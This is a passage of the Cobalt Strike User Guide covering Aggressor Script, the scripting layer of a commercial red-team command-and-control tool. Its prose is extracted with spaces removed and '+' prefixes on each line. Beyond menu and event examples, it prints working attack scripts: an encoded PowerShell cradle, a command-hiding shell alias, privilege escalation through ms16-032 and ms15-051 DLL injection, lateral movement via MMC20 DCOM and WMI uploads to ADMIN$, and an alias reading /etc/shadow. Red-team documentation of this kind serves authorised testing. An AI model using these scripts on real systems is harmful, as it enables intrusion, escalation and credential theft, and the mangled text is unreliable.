+TheAggressorScriptengineisthegluefeatureinCobaltStrike.MostCobaltStrikedialogsand
+featuresarewrittenasstand-alonemodulesthatexposesomeinterfacetotheAggressorScript
+engine.
+CobaltStrikeUserGuide www.fortra.com page:191
+
+AggressorScript/CobaltStrike
+Aninternalscript,default.cna,definesthedefaultCobaltStrikeexperience.Thisscriptdefines
+CobaltStrike'stoolbarbuttons,popupmenus,anditalsoformatstheoutputformostCobalt
+Strikeevents.
+ThischapterwillshowyouhowthesefeaturesworkandempoweryoutoshapetheCobalt
+Strikeclienttoyourneeds.
+figure73-Thedefault.cnascript
+Keyboard Shortcuts
+Scriptsmaycreatekeyboardshortcuts.Usethebindkeywordtobindakeyboardshortcut.This
+exampleshowsHello World!inadialogboxwhenCtrlandHarepressedtogether.
+bind Ctrl+H {
+show_message("Hello World!");
+}
+CobaltStrikeUserGuide www.fortra.com page:192
+
+AggressorScript/CobaltStrike
+KeyboardshortcutsmaybeanyASCIIcharactersoraspecialkey.Shortcutsmayhaveoneor
+moremodifiersappliedtothem.Amodifierisoneof:Ctrl,Shift,Alt,orMeta.Scriptsmayspecify
+themodifier+key.
+Popup Menus
+ScriptsmayalsoaddtoCobaltStrike'smenustructureorre-defineit.Thepopupkeywordbuilds
+amenuhierarchyforapopuphook.
+Here'sthecodethatdefinesCobaltStrike'shelpmenu:
+popup help {
+item("&Homepage", { url_open("https://www.cobaltstrike.com/"); });
+item("&Support", { url_open("https://www.cobaltstrike.com/support"); });
+item("&Arsenal", { url_open("https://www.cobaltstrike.com/scripts"); });
+separator();
+item("&Malleable C2 Profile", { openMalleableProfileDialog(); });
+item("&System Information", { openSystemInformationDialog(); });
+separator();
+item("&About", { openAboutDialog(); });
+}
+Thisscripthooksintothehelppopuphookanddefinesseveralmenuitems.The&inthemenu
+itemnameisitskeyboardaccelerator.Thecodeblockassociatedwitheachitemexecutes
+whentheuserclicksonit.
+Scriptsmaydefinemenuswithchildrenaswell.Themenukeyworddefinesanewmenu.When
+theuserhoversoverthemenu,theblockofcodeassociatedwithitisexecutedandusedto
+buildthechildmenu.
+Here'sthePivotGraphmenuasanexampleofthis:
+popup pgraph {
+menu "&Layout" {
+item "&Circle" { graph_layout($1, "circle"); }
+item "&Stack" { graph_layout($1, "stack"); }
+menu "&Tree" {
+item "&Bottom" { graph_layout($1, "tree-bottom"); }
+item "&Left" { graph_layout($1, "tree-left"); }
+item "&Right" { graph_layout($1, "tree-right"); }
+item "&Top" { graph_layout($1, "tree-top"); }
+}
+separator();
+item "&None" { graph_layout($1, "none"); }
+CobaltStrikeUserGuide www.fortra.com page:193
+
+AggressorScript/CobaltStrike
+}
+}
+IfyourscriptspecifiesamenuhierarchyforaCobaltStrikemenuhook,itwilladdtothemenus
+thatarealreadyinplace.Usethe&popup_clearfunctiontocleartheotherregisteredmenu
+itemsandre-defineapopuphierarchytoyourtaste.
+Custom Output
+ThesetkeywordinAggressorScriptdefineshowtoformataneventandpresentitsoutputto
+theuser.Here'sanexampleofthesetkeyword:
+set EVENT_SBAR_LEFT {
+return "[" . tstamp(ticks()) . "] " . mynick();
+}
+set EVENT_SBAR_RIGHT {
+return "[lag: $1 $+ ]";
+}
+TheabovecodedefinesthecontentofthestatusbarinCobaltStrike'sEventLog(View -> Event
+Log).Theleftsideofthisstatusbarshowsthecurrenttimeandyournickname.Therightside
+showstheround-triptimeforamessagebetweenyourCobaltStrikeclientandtheteamserver.
+YoumayoverrideanysetoptionintheCobaltStrikedefaultscript.Createyourownfilewith
+definitionsforeventsyoucareabout.LoaditintoCobaltStrike.CobaltStrikewilluseyour
+definitionsoverthebuilt-inones.
+Events
+Usetheonkeywordtodefineahandlerforanevent.ThereadyeventfireswhenCobaltStrikeis
+connectedtotheteamserverandreadytoactonyourbehalf.
+on ready {
+show_message("Ready for action!");
+}
+CobaltStrikegenerateseventsforavarietyofsituations.Usethe*meta-eventtowatchall
+eventsCobaltStrikefires.
+on * {
+local('$handle $event $args');
+CobaltStrikeUserGuide www.fortra.com page:194
+
+AggressorScript/DataModel
+$event = shift(@_);
+$args = join(" ", @_);
+$handle = openf(">>eventspy.txt");
+writeb($handle, "[ $+ $event $+ ] $args");
+closef($handle);
+}
+Data Model
+CobaltStrike'steamserverstoresyourhosts,services,credentials,andotherinformation.It
+alsobroadcaststhisinformationandmakesitavailabletoallclients.
+Data API
+Usethe&data_queryfunctiontoqueryCobaltStrike'sdatamodel.Thisfunctionhasaccessto
+allstateandinformationmaintainedbytheCobaltStrikeclient.Use&data_keystogetalistof
+thedifferentpiecesofdatayoumayquery.ThisexamplequeriesalldatainCobaltStrike'sdata
+modelandexportsittoatextfile:
+command export {
+local('$handle $model $row $entry $index');
+$handle = openf(">export.txt");
+foreach $model (data_keys()) {
+println($handle, "== $model ==");
+println($handle, data_query($model));
+}
+closef($handle);
+println("See export.txt for the data.");
+}
+CobaltStrikeprovidesseveralfunctionsthatmakeitmoreintuitivetoworkwiththedatamodel.
+Model Function Description
+applications &applications SystemProfilerResults[View -> Applications]
+archives &archives Engagementevents/activities
+CobaltStrikeUserGuide www.fortra.com page:195
+
+AggressorScript/Listeners
+Model Function Description
+beacons &beacons Activebeacons
+credentials &credentials Usernames,passwords,etc.
+downloads &downloads Downloadedfiles
+keystrokes &keystrokes KeystrokesreceivedbyBeacon
+screenshots &screenshots ScreenshotscapturedbyBeacon
+services &services Servicesandserviceinformation
+sites &sites AssetshostedbyCobaltStrike
+socks &pivots SOCKSproxyserversandportforwards
+targets &targets Hostsandhostinformation
+Thesefunctionsreturnanarraywithonerowforeachentryinthedatamodel.Eachentryisa
+dictionarywithdifferentkey/valuepairsthatdescribetheentry.
+ThebestwaytounderstandthedatamodelistoexploreitthroughtheAggressorScript
+console.GotoView -> Script Consoleandusethexcommandtoevaluateanexpression.For
+example:
+figure74-QueryingDatafromtheAggressorScriptconsole
+Useon DATA_KEYtosubscribetochangestoaspecificdatamodel.
+on keystrokes {
+println("I have new keystrokes: $1");
+}
+Listeners
+CobaltStrikeUserGuide www.fortra.com page:196
+
+AggressorScript/Listeners
+ListenersareCobaltStrike'sabstractionontopofpayloadhandlers.Alistenerisaname
+attachedtopayloadconfigurationinformation(e.g.,protocol,host,port,etc.)and,insome
+cases,apromisetosetupaservertoreceiveconnectionsfromthedescribedpayload.
+Listener API
+AggressorScriptaggregateslistenerinformationfromalloftheteamserversyou'recurrently
+connectedto.Thismakesiteasytopasssessionstoanotherteamserver.Togetalistofall
+listenernames,usethe&listenersfunction.Ifyouwouldliketoworkwithlocallistenersonly,use
+&listeners_local.The&listener_infofunctionresolvesalistenernametoitsconfiguration
+information.ThisexampledumpsalllistenersandtheirconfigurationtotheAggressorScript
+console:
+command listeners {
+local('$name $key $value');
+foreach $name (listeners()) {
+println("== $name == ");
+foreach $key => $value (listener_info($name)) {
+println("$[20]key : $value");
+}
+}
+}
+Creating Listeners
+Use&listener_create_exttocreatealistenerandstartapayloadhandlerassociatedwithit.
+Choosing Listeners
+Use&openPayloadHelpertoopenadialogthatlistsallavailablelisteners.Aftertheuserselects
+alistener,thisdialogwillclose,andCobaltStrikewillrunacallbackfunction.Here'sthesource
+codeforBeacon'sspawnmenu:
+item "&Spawn" {
+openPayloadHelper(lambda({
+binput($bids, "spawn $1");
+bspawn($bids, $1);
+}, $bids => $1));
+}
+Stagers
+CobaltStrikeUserGuide www.fortra.com page:197
+
+AggressorScript/Listeners
+Astagerisatinyprogramthatdownloadsapayloadandpassesexecutiontoit.Stagersare
+idealforsize-constrainedpayloaddeliveryvector(e.g.,auser-drivenattack,amemory
+corruptionexploit,oraone-linercommand.Stagersdohavedownsidesthough.Theyintroduce
+anadditionalcomponenttoyourattackchainthatispossibletodisrupt.CobaltStrike'sstagers
+arebasedonthestagersintheMetasploitFrameworkandthesearewell-signaturedand
+understoodinmemoryaswell.Usepayload-specificstagersifyoumust;butit'sbesttoavoid
+themotherwise.
+Use&stagertoexportapayloadstagertiedtoaCobaltStrikepayload.Notallpayloadoptions
+haveanexplicitpayloadstager.Notallstagershavex64options.
+The&artifact_stagerfunctionwillexportaPowerShellscript,executable,orDLLthatrunsa
+stagerassociatedwithaCobaltStrikepayload.
+Local Stagers
+Forpost-exploitationactionsthatrequiretheuseofastager,usealocalhost-onlybind_tcp
+stager.Theuseofthisstagerallowsastaging-requiredpost-exploitationactiontoworkwithall
+ofCobaltStrike'spayloadsequally.
+Use&stager_bind_tcptoexportabind_tcppayloadstager.Use&beacon_stage_tcptodelivera
+payloadtothisstager.
+&artifact_generalwillacceptthisarbitrarycodeandgenerateaPowerShellscript,executable,or
+DLLtohostit.
+Named Pipe Stager
+CobaltStrikedoeshaveabind_pipestagerthatisusefulforsomelateralmovementsituations.
+Thisstagerisx86only.Use&stager_bind_pipetoexportthisbind_pipestager.Use&beacon_
+stage_pipetodeliverapayloadtothisstager.
+&artifact_generalwillacceptthisarbitrarycodeandgenerateaPowerShellscript,executable,or
+DLLtohostit.
+Stageless Payloads
+Use&payloadtoexportaCobaltStrikepayload(initsentirety)asaready-to-runposition-
+independentprogram.
+&artifact_payloadwillexportaPowerShellscript,executable,orDLLthatcontaintsthispayload.
+CobaltStrikeUserGuide www.fortra.com page:198
+
+AggressorScript/Beacon
+Beacon
+BeaconisCobaltStrike'sasynchronouspost-exploitationagent.Inthischapter,wewillexplore
+optionstoautomateBeaconwithCobaltStrike'sAggressorScript.
+Metadata
+CobaltStrikeassignsasessionIDtoeachBeacon.ThisIDisarandomnumber.CobaltStrike
+associatestasksandmetadatawitheachBeaconID.Use&beaconstoquerymetadataforall
+currentBeaconsessions.Use&beacon_infotoquerymetadataforaspecificBeaconsession.
+Here'sascripttodumpinformationabouteachBeaconsession:
+command beacons {
+local('$entry $key $value');
+foreach $entry (beacons()) {
+println("== " . $entry['id'] . " ==");
+foreach $key => $value ($entry) {
+println("$[20]key : $value");
+}
+println();
+}
+}
+Aliases
+YoumaydefinenewBeaconcommandswiththealiaskeyword.Here'sahelloaliasthatprints
+HelloWorldinaBeaconconsole.
+alias hello {
+blog($1, "Hello World!");
+}
+Puttheaboveintoascript,loaditintoCobaltStrike,andopenaBeaconconsole.Thenenterin
+thehellocommandandpressenter.CobaltStrikewilleventabcompleteyouraliasesforyou.
+YoushouldseeHelloWorld!intheBeaconconsole.
+Youmayalsousethe&aliasfunctiontodefineanalias.
+CobaltStrikepassesthefollowingargumentstoanalias:$0isthealiasnameandarguments
+withoutanyparsing.$1istheIDoftheBeaconthealiaswastypedfrom.Thearguments$2and
+oncontainanindividualargumentpassedtothealias.Thealiasparsersplitsargumentsby
+spaces.Usersmayuse"doublequotes"togroupwordsintooneargument.
+CobaltStrikeUserGuide www.fortra.com page:199
+
+AggressorScript/Beacon
+alias saywhat {
+blog($1, "My arguments are: " . substr($0, 8) . "\n");
+}
+YoumayalsoregisteryouraliaseswithBeacon'shelpsystem.Use&beacon_command_register
+toregisteracommand.
+AliasesareaconvenientwaytoextendBeaconandmakeityourown.Aliasesalsoplaywellinto
+CobaltStrike'sthreatemulationrole.Youmayusealiasestoscriptcomplexpost-exploitation
+actionsinawaythatmapstoanotheractor'stradecraft.Yourredteamoperatorssimplyneed
+toloadascript,learnthealiases,andtheycanoperatewithyourscriptedtacticsinawaythat's
+consistentwiththeactoryou'reemulating.
+Reacting to new Beacons
+AcommonuseofAggressorScriptistoreacttonewBeacons.Usethebeacon_initialeventto
+setupcommandsthatshouldrunwhenaBeaconchecksinforthefirsttime.
+on beacon_initial {
+# do some stuff
+}
+The$1argumenttobeacon_initialistheIDofthenewBeacon.
+Thebeacon_initialeventfireswhenaBeaconreportsmetadataforthefirsttime.Thismeansa
+DNSBeaconwillnotfirebeacon_initialuntilitsaskedtorunacommand.TointeractwithaDNS
+Beaconthatcallshomeforthefirsttime,usethebeacon_initial_emptyevent.
+# some sane defaults for DNS Beacon
+on beacon_initial_empty {
+bmode($1, "dns-txt");
+bcheckin($1);
+}
+Popup Menus
+YoumayalsoaddontoBeaconspopupmenu.Aliasesarenice,buttheyonlyaffectoneBeacon
+atatime.Throughapopupmenu,yourscript'susersmaytaskmultipleBeaconstotakethe
+desiredactionatonetime.
+Thebeacon_topandbeacon_bottompopuphooksletyouaddtothedefaultBeaconmenu.
+TheargumenttotheBeaconpopuphooksisanarrayofselectedBeaconIDs.
+CobaltStrikeUserGuide www.fortra.com page:200
+
+AggressorScript/Beacon
+popup beacon_bottom {
+item "Run All..." {
+prompt_text("Which command to run?", "whoami /groups", lambda({
+binput(@ids, "shell $1");
+bshell(@ids, $1);
+}, @ids => $1));
+}
+}
+The Logging Contract
+CobaltStrike3.0andlaterdoadecentjoboflogging.EachcommandissuedtoaBeaconis
+attributedtoanoperatorwithadateandtimestamp.TheBeaconconsoleintheCobaltStrike
+clienthandlesthislogging.Scriptsthatexecutecommandsfortheuserdonotrecord
+commandsoroperatorattributiontothelog.Thescriptisresponsiblefordoingthis.Usethe
+&binputfunctiontodothis.ThiscommandwillpostamessagetotheBeacontranscriptasif
+theuserhadtypedacommand.
+Acknowledging Tasks
+Customaliasesshouldcallthe&btaskfunctiontodescribetheactiontheuseraskedfor.This
+outputissenttotheBeaconlogandit'salsousedinCobaltStrike'sreports.MostAggressor
+ScriptfunctionsthatissueatasktoBeaconwillprinttheirownacknowledgementmessage.If
+you'dliketosuppressthis,add!tothefunctionname.Thiswillrunthequietvariantofthe
+function.Aquietfunctiondoesnotprintataskacknowledgement.Forexample,&bshell!isthe
+quietvariantof&bshell.
+alias survey {
+btask($1, "Surveying the target!", "T1082");
+bshell!($1, "echo Groups && whoami /groups");
+bshell!($1, "echo Processes && tasklist /v");
+bshell!($1, "echo Connections && netstat -na | findstr \"EST\"");
+bshell!($1, "echo System Info && systeminfo");
+}
+Thelastargumentto&btaskisacomma-separatedlistofATT&CKtechniques.T1082is
+SystemInformationDiscovery.ATT&CKisaprojectfromtheMITRECorporationtocategorize
+anddocumentattackeractions.CobaltStrikeusesthesetechniquestobuilditsTactics,
+Techniques,andProceduresreport.YoumaylearnmoreaboutMITRE'sATT&CKmatrixat:
+https://attack.mitre.org/
+Conquering the Shell
+CobaltStrikeUserGuide www.fortra.com page:201
+
+AggressorScript/Beacon
+Aliasesmayoverrideexistingcommands.Here'sanAggressorScriptimplementationof
+Beacon'spowershellcommand:
+alias powershell {
+local('$args $cradle $runme $cmd');
+# $0 is the entire command with no parsing.
+$args = substr($0, 11);
+# generate the download cradle (if one exists) for an imported PowerShell script
+$cradle = beacon_host_imported_script($1);
+# encode our download cradle AND cmdlet+args we want to run
+$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
+# Build up our entire command line.
+$cmd = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
+# task Beacon to run all of this.
+btask($1, "Tasked beacon to run: $args", "T1086");
+beacon_execute_job($1, "powershell", $cmd, 1);
+}
+ThisaliasdefinesapowershellcommandforusewithinBeacon.Weuse$0tograbthedesired
+PowerShellstringwithoutanyparsing.It'simportanttoaccountforanimportedPowerShell
+script(iftheuserimportedonewithpowershell-import).Weuse&beacon_host_imported_script
+forthis.ThisfunctiontasksBeacontohostanimportedscriptonaone-offwebserverboundto
+localhost.ItalsoreturnsastringwiththePowerShelldownloadcradlethatdownloadsand
+evaluatestheimportedscript.The-EncodedCommandflaginPowerShellacceptsascriptasa
+base64string.There'sonewrinkle.WemustencodeourstringaslittleendianUTF16text.This
+aliasuses&str_encodetodothis.The&btaskcalllogsthisrunofPowerShellandassociatesit
+withtacticT1086.The&beacon_execute_jobfunctiontasksBeacontorunpowershelland
+reportitsoutputbacktoBeacon.
+Similarly,wemayre-definetheshellcommandinBeacontoo.Thisaliascreatesanalternate
+shellcommandthathidesyourWindowscommandsinanenvironmentvariable.
+alias shell {
+local('$args');
+$args = substr($0, 6);
+btask($1, "Tasked beacon to run: $args (OPSEC)", "T1059");
+bsetenv!($1, "_", $args);
+beacon_execute_job($1, "%COMSPEC%", " /C %_%", 0);
+}
+CobaltStrikeUserGuide www.fortra.com page:202
+
+AggressorScript/Beacon
+The&btaskcalllogsourintentionandassociatesitwithtacticT1059.The&bsetenvassignsour
+Windowscommandtotheenvironmentvariable_.Thescriptuses!tosuppress&bsetenv'stask
+acknowledgement.The&beacon_execute_jobfunctionruns%COMSPEC%withargumnents /C
+%_%.Thisworksbecause&beacon_execute_jobwillresolveenvironmentvariablesinthe
+commandparameter.Itdoesnotresolveenvironmentvariablesintheargumentparameter.
+Becauseofthis,wecanuse%COMSPEC%tolocatetheuser'sshell,butpass%_%asan
+argumentwithoutimmediateinterpolation.
+Privilege Escalation (Run a Command)
+Beacon'srunasadmincommandattemptstorunacommandinanelevatedcontext.This
+commandacceptsanelevatornameandacommand(commandANDarguments:)).The
+&beacon_elevator_registerfunctionmakesanewelevatoravailabletorunasadmin..
+beacon_elevator_register("ms16-032", "Secondary Logon Handle Privilege
+Escalation (CVE-2016-099)", &ms16_032_elevator);
+Thiscoderegisterstheelevatorms16-032withBeacon'srunasadmincommand.Adescription
+isgivenaswell.Whentheusertypesrunasadmin ms16-032 notepad.exe,CobaltStrikewill
+run&ms16_032_elevatorwiththesearguments:$1isthebeaconsessionID.$2isthe
+commandandarguments.Here'sthe&ms16_032_elevatorfunction:
+# Integrate ms16-032
+# Sourced from Empire:
+https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
+sub ms16_032_elevator {
+local('$handle $script $oneliner');
+# acknowledge this command
+btask($1, "Tasked Beacon to execute $2 via ms16-032", "T1068");
+# read in the script
+$handle = openf(getFileProper(script_resource("modules"), "Invoke-
+MS16032.ps1"));
+$script = readb($handle, -1);
+closef($handle);
+# host the script in Beacon
+$oneliner = beacon_host_script($1, $script);
+# run the specified command via this exploit.
+bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $2 $+ \"", $oneliner);
+}
+CobaltStrikeUserGuide www.fortra.com page:203
+
+AggressorScript/Beacon
+Thisfunctionuses&btasktoacknowledgetheactiontotheuser.Thedescriptionin&btaskwill
+goinCobaltStrike'slogsandreportsaswell.T1068istheMITREATT&CKtechniquethat
+correspondstothisaction.
+Theendofthisfunctionuses&bpowerpicktorunInvoke-MS16032withanargumenttorun
+ourcommand.ThePowerShellscriptthatimplementsInvoke-MS16032istoolargeforaone-
+linerthough.Tomitigatethis,theelevatorfunctionuses&beacon_host_scripttohostthelarge
+scriptwithinBeacon.The&beacon_host_scriptfunctionreturnsaone-linertograbthishosted
+scriptandevaluateit.
+Theexclamationpointafter&bpowerpicktellsAggressorScripttocallthequietvariantsofthis
+function.Quietfunctionsdonotprintataskdescription.
+There'snotmuchelsetodescribehere.Acommandelevatorscriptjustneedstoruna
+command.:)
+Privilege Escalation (Spawn a Session)
+Beacon'selevatecommandattemptstospawnanewsessionwithelevatedprivileges.This
+commandacceptsanexploitnameandalistener.The&beacon_exploit_registerfunction
+makesanewexploitavailabletoelevate.
+beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit
+(CVE 2015-1701)", &ms15_051_exploit);
+Thiscoderegisterstheexploitms15-051withBeacon'selevatecommand.Adescriptionis
+givenaswell.Whentheusertypeselevate ms15-051 foo,CobaltStrikewillrun&ms15_051_
+exploitwiththesearguments:$1isthebeaconsessionID.$2isthelistenername(e.g.,foo).
+Here'sthe&ms15_051_exploitfunction:
+# Integrate windows/local/ms15_051_client_copy_image from Metasploit
+# https://github.com/rapid7/metasploit-
+framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+sub ms15_051_exploit {
+local('$stager $arch $dll');
+# acknowledge this command
+btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051", "T1068");
+# tune our parameters based on the target arch
+if (-is64 $1) {
+$arch = "x64";
+$dll = getFileProper(script_resource("modules"), "cve-2015-1701.x64.dll");
+}
+CobaltStrikeUserGuide www.fortra.com page:204
+
+AggressorScript/Beacon
+else {
+$arch = "x86";
+$dll = getFileProper(script_resource("modules"), "cve-2015-1701.x86.dll");
+}
+# generate our shellcode
+$stager = payload($2, $arch);
+# spawn a Beacon post-ex job with the exploit DLL
+bdllspawn!($1, $dll, $stager, "ms15-051", 5000);
+# link to our payload if it's a TCP or SMB Beacon
+beacon_link($1, $null, $2);
+}
+Thisfunctionuses&btasktoacknowledgetheactiontotheuser.Thedescriptionin&btaskwill
+goinCobaltStrike'slogsandreportsaswell.T1068istheMITREATT&CKtechniquethat
+correspondstothisaction.
+ThisfunctionrepurposesanexploitfromtheMetasploitFramework.Thisexploitiscompiledas
+cve-2015-1701.[arch].dllwithx86andx64variants.Thisfunction'sfirsttaskistoreadthe
+exploitDLLthatcorrespondstothetargetsystem'sarchitecture.The-is64predicatehelpswith
+this.
+The&payloadfunctiongeneratesrawoutputforourlistenernameandthespecified
+architecture.
+The&bdllspawnfunctionspawnsatemporaryprocess,injectsourexploitDLLintoit,and
+passesourexportedpayloadasanargument.ThisisthecontracttheMetasploitFramework
+usestopassshellcodetoitsprivilegeescalationexploitsimplementedasReflectiveDLLs.
+Finally,thisfunctioncalls&beacon_link.IfthetargetlistenerisanSMBorTCPBeaconpayload,
+&beacon_linkwillattempttoconnecttoit.
+Lateral Movement (Run a Command)
+Beacon'sremote-execcommandattemptstorunacommandonaremotetarget.This
+commandacceptsaremote-execmethod,atarget,andacommand+arguments.The
+&beacon_remote_exec_method_registerfunctionisbothareallylongfunctionnameandmakes
+anewmethodavailabletoremote-exec.
+beacon_remote_exec_method_register("com-mmc20", "Execute command via
+MMC20.Application COM Object", &mmc20_exec_method);
+CobaltStrikeUserGuide www.fortra.com page:205
+
+AggressorScript/Beacon
+Thiscoderegisterstheremote-execmethodcom-mmc20withBeacon'sremote-exec
+command.Adescriptionisgivenaswell.Whentheusertypesremote-exec com-mmc20
+c:\windows\temp\malware.exe,CobaltStrikewillrun&mmc20_exec_methodwiththese
+arguments:$1isthebeaconsessionID.$2isthetarget.$3isthecommandandarguments.
+Here'sthe&mmc20_exec_methodfunction:
+sub mmc20_exec_method {
+local('$script $command $args');
+# state what we're doing.
+btask($1, "Tasked Beacon to run $3 on $2 via DCOM", "T1175");
+# separate our command and arguments
+if ($3 ismatch '(.*?) (.*)') {
+($command, $args) = matched();
+}
+else {
+$command = $3;
+$args = "";
+}
+# build script that uses DCOM to invoke ExecuteShellCommand on MMC20.Application
+object
+$script = '[activator]::CreateInstance([type]::GetTypeFromProgID
+("MMC20.Application", "';
+$script .= $2;
+$script .= '")).Document.ActiveView.ExecuteShellCommand("';
+$script .= $command;
+$script .= '", $null, "';
+$script .= $args;
+$script .= '", "7");';
+# run the script we built up
+bpowershell!($1, $script, "");
+}
+Thisfunctionuses&btasktoacknowledgethetaskanddescribeittotheoperator(andlogsand
+reports).T1175istheMITREATT&CKtechniquethatcorrespondstothisaction.Ifyouroffense
+techniquedoesnotfitintoMITREATT&CK,don'tfret.Somecustomersareverymuchreadyfor
+achallengeandbenefitwhentheirredteamcreativelydeviatesfromwhatareknownoffense
+techniques.Doconsiderwritingablogpostaboutitfortherestofuslater.
+Thisfunctionthensplitsthe$3argumentintocommandandargumentportions.Thisisdone
+becausethetechniquerequiresthatthesevaluesareseparate.
+Afterwards,thisfunctionbuildsupaPowerShellcommandstringthatlookslikethis:
+CobaltStrikeUserGuide www.fortra.com page:206
+
+AggressorScript/Beacon
+[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",
+"TARGETHOST")).Document.ActiveView.ExecuteShellCommand
+("c:\windows\temp\a.exe", $null, "", "7");
+ThiscommandusestheMMC20.ApplicationCOMobjecttoexecuteacommandonaremote
+target.ThismethodwasdiscoveredasalateralmovementoptionbyMattNelson:
+https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-
+object/
+Thisfunctionuses&bpowershelltorunthisPowerShellscript.Thesecondargumentisan
+emptystringtosuppressthedefaultdownloadcradle(iftheoperatorranpowershell-import
+previously).Ifyouprefer,youcouldmodifythisexampletouse&bpowerpicktorunthisone-liner
+withoutpowershell.exe.
+Thisexampleisoneofthemajormotivatorsformetoaddtheremote-execcommandandAPI
+toCobaltStrike.Thisisanexcellent"executethiscommand"primitive,butend-to-end
+weaponization(spawningasession)usuallyincludesusingthisprimitivetorunaPowerShell
+one-linerontarget.Foralotofreasons,thisisnottherightchoiceinmanyengagements.
+Exposingthisprimitivethroughtheremote-execinterfacegivesyouachoiceabouthowtobest
+makeuseofthiscapability(withoutforcingchoicesyoudon'twantmadeforyou).
+Lateral Movement (Spawn a Session)
+Beacon'sjumpcommandattemptstospawnanewsessiononaremotetarget.Thiscommand
+acceptsanexploitname,atarget,andalistener.The&beacon_remote_exploit_registerfunction
+makesanewmoduleavailabletojump.
+beacon_remote_exploit_register("wmi", "x86", "Use WMI to run a Beacon
+payload", lambda(&wmi_remote_spawn, $arch => "x86"));
+beacon_remote_exploit_register("wmi64", "x64", "Use WMI to run a Beacon
+payload", lambda(&wmi_remote_spawn, $arch => "x64"));
+Theabovefunctionsregisterwmiandwmi64optionsforusewiththejumpcommand.The
+&lambdafunctionmakesacopyof&wmi_remote_spawnandsets$archasastaticvariable
+scopedtothatfunctioncopy.Usingthismethod,we'reabletousethesamelogictopresenttwo
+lateralmovementoptionsfromoneimplementation.Here'sthe&wmi_remote_spawnfunction:
+# $1 = bid, $2 = target, $3 = listener
+sub wmi_remote_spawn {
+local('$name $exedata');
+btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3) . ") via WMI",
+"T1047");
+CobaltStrikeUserGuide www.fortra.com page:207
+
+AggressorScript/SSHSessions
+# we need a random file name.
+$name = rand(@("malware", "evil", "detectme")) . rand(100) . ".exe";
+# generate an EXE. $arch defined via &lambda when this function was registered with
+# beacon_remote_exploit_register
+$exedata = artifact_payload($3, "exe", $arch);
+# upload the EXE to our target (directly)
+bupload_raw!($1, "\\\\ $+ $2 $+ \\ADMIN\$\\ $+ $name", $exedata);
+# execute this via WMI
+brun!($1, "wmic /node:\" $+ $2 $+ \" process call create \"\\\\ $+ $2 $+ \\ADMIN\$\\
+$+ $name $+ \"");
+# assume control of our payload (if it's an SMB or TCP Beacon)
+beacon_link($1, $2, $3);
+}
+The&btaskfunctionfulfillsourobligationtologwhattheuserintendedtodo.TheT1047
+argumentassociatesthisactionwithTactic1047inMITRE'sATT&CKmatrix.
+The&artfiact_payloadfunctiongeneratesastagelessartifacttorunourpayload.Itusesthe
+ArtifactKithookstogeneratethisfile.
+The&bupload_rawfunctionuploadstheartifactdatatothetarget.Thisfunctionuses
+\\target\ADMIN$\filename.exetodirectlywritetheEXEtotheremotetargetviaanadmin-only
+share.
+&brunrunswmic /node:"target" process call create "\\target\ADMIN$\filename.exe"to
+executethefileontheremotetarget.
+&beacon_linkassumescontrolofthepayload,ifit'sanSMBorTCPBeacon.
+SSH Sessions
+CobaltStrike'sSSHclientspeakstheSMBBeaconprotocolandimplementsasub-setof
+Beacon'scommandsandfunctions.FromtheperspectiveofAggressorScript,anSSHsession
+isaBeaconsessionwithfewercommands.
+What type of session is it?
+MuchlikeBeaconsessions,SSHsessionshaveanID.CobaltStrikeassociatestasksand
+metadatawiththisID.The&beaconsfunctionwillalsoreturninformationaboutallCobaltStrike
+CobaltStrikeUserGuide www.fortra.com page:208
+
+AggressorScript/SSHSessions
+sessions(SSHsessionsANDBeaconsessions).Usethe-issshpredicatetotestifasessionis
+anSSHsession.The-isbeaconpredicatetestsifasessionisaBeaconsession.
+Here'safunctiontofilter&beaconstoSSHsessionsonly:
+sub ssh_sessions {
+return map({
+if (-isssh $1['id']) {
+return $1;
+}
+else {
+return $null;
+}
+}, beacons());
+}
+Aliases
+YoumayaddcommandstotheSSHconsolewiththessh_aliaskeyword.Here'sascripttoalias
+hashdumptograb/etc/shadowifyou'reanadmin.
+ssh_alias hashdump {
+if (-isadmin $1) {
+bshell($1, "cat /etc/shadow");
+}
+else {
+berror($1, "You're (probably) not an admin");
+}
+}
+Puttheaboveintoascript,loaditintoCobaltStrike,andtypehashdumpinsideofanSSH
+console.CobaltStrikewilltabcompleteSSHaliasestoo.
+Youmayalsousethe&ssh_aliasfunctiontodefineanSSHalias.
+CobaltStrikepassesthefollowingargumentstoanalias:$0isthealiasnameandarguments
+withoutanyparsing.$1istheIDofthesessionthealiaswastypedfrom.Thearguments$2and
+oncontainanindividualargumentpassedtothealias.Thealiasparsersplitsargumentsby
+spaces.Usersmayuse"doublequotes"togroupwordsintooneargument.
+YoumayalsoregisteryouraliaseswiththeSSHconsole'shelpsystem.Use&ssh_command_
+registertoregisteracommand.
+Reacting to new SSH Sessions
+CobaltStrikeUserGuide www.fortra.com page:209
+
+AggressorScript/OtherTopics
+AggressorScriptsmayreacttonewSSHsessionstoo.Usethessh_initialeventtosetup
+commandsthatshouldrunwhenaSSHsessionbecomesavailable.
+on ssh_initial {
+# do some stuff
+}
+The$1argumenttossh_initialistheIDofthenewsession.
+Popup Menus
+YoumayalsoaddontotheSSHpopupmenu.Thesshpopuphookletsyouadditemstothe
+SSHmenu.TheargumenttotheSSHpopupmenuisanarrayofselectedsessionIDs.
+popup ssh {
+item "Run All..." {
+prompt_text("Which command to run?", "w", lambda({
+binput(@ids, "shell $1");
+bshell(@ids, $1);
+}, @ids => $1));
+}
+}
+You'llnoticethatthisexampleisverysimilartotheexampleusedintheBeaconchapter.For
+example,Iuse&binputtopublishinputtotheSSHconsole.Iuse&bshelltotasktheSSH
+sessiontorunacommand.Thisisallcorrect.Remember,internally,anSSHsessionisa
+BeaconsessionasfarasmostofCobaltStrike/AggressorScriptisconcerned.
+Other Topics
+CobaltStrikeoperatorsandscriptscommunicateglobaleventstothesharedeventlog.
+AggressorScriptsmayrespondtothisinformationtoo.Theeventlogeventsbeginwith
+event_.Tolistforglobalnotifications,usetheevent_notifyhook.
